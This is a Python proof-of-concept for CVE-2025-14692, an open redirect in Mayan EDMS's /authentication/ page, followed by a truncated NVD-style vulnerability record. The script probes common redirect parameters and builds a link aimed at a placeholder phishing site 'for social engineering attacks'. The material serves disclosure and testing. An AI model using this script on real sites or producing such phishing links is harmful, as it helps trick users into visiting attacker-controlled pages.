CVE-2025-14692

# CVE-2025-14692 Mayan EDMS Open Redirect PoC # Affected: Mayan EDMS <= 4.10.1 # Reference: https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC import requests import urllib.parse from colorama import Fore, Style, init init(autoreset=True) def check_open_redirect(target_url, redirect_target): """ Check if Mayan EDMS is vulnerable to open redirect Args: target_url: Base URL of Mayan EDMS instance (e.g., https://target.com/) redirect_target: Malicious URL to redirect to Returns: bool: True if vulnerable, False otherwise """ # Construct the vulnerable URL with redirect parameter auth_url = f"{target_url.rstrip('/')}/authentication/" # Common redirect parameter names used in authentication flows redirect_params = ['next', 'redirect', 'redirect_to', 'url', 'continue', 'return_url'] vulnerable = False for param in redirect_params: try: params = {param: redirect_target} response = requests.get( auth_url, params=params, allow_redirects=False, timeout=10, verify=False ) # Check if redirect header points to external domain if 'location' in response.headers: location = response.headers['location'] if redirect_target in location or redirect_target in urllib.parse.unquote(location): print(f"{Fore.RED}[+] VULNERABLE: Parameter '{param}' allows open redirect{Style.RESET_ALL}") print(f"{Fore.YELLOW}[*] Redirects to: {location}{Style.RESET_ALL}") vulnerable = True except requests.RequestException as e: print(f"{Fore.RED}[!] Error testing parameter '{param}': {e}{Style.RESET_ALL}") return vulnerable def generate_malicious_link(base_url, redirect_target): """Generate malicious link for social engineering attacks""" auth_url = f"{base_url.rstrip('/')}/authentication/" malicious_url = f"{auth_url}?next={urllib.parse.quote(redirect_target)}" return malicious_url if __name__ == "__main__": print(f"{Fore.CYAN}CVE-2025-14692 Mayan EDMS Open Redirect Checker{Style.RESET_ALL}") print("=" * 60) # Configuration target = "https://vulnerable-mayan-edms.com" evil_domain = "https://malicious-phishing-site.com" # Check vulnerability print(f"{Fore.WHITE}[*] Target: {target}{Style.RESET_ALL}") print(f"{Fore.WHITE}[*] Malicious target: {evil_domain}{Style.RESET_ALL}\n") result = check_open_redirect(target, evil_domain) if result: print(f"{Fore.RED}[!] Target is VULNERABLE to CVE-2025-14692{Style.RESET_ALL}") malicious_link = generate_malicious_link(target, evil_domain) print(f"{Fore.YELLOW}[*] Malicious link: {malicious_link}{Style.RESET_ALL}") else: print(f"{Fore.GREEN}[+] Target appears to be NOT vulnerable{Style.RESET_ALL}") print("\n[*] Remediation: Upgrade to Mayan EDMS >= 4.10.2")

{"cve": {"id": "CVE-2025-14692", "sourceIdentifier": "[email protected]", "published": "2025-12-15T00:15:39.563", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is \"[f]ixed in version 4.10.2\". Furthermore, that \"[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete.\""}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mayan-edms:mayan_edms:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "22B6971B-A1A5-4607-8F0E-61AB58D56521"}]}]}], "references": [{"url": "https://docs.mayan-edms.com/chapters/releases/4.10.2.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC/tree/main", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336410", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336410", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.711729", "source": "[email protected]", "tags": ["Third Party Advisory", " ... (truncated)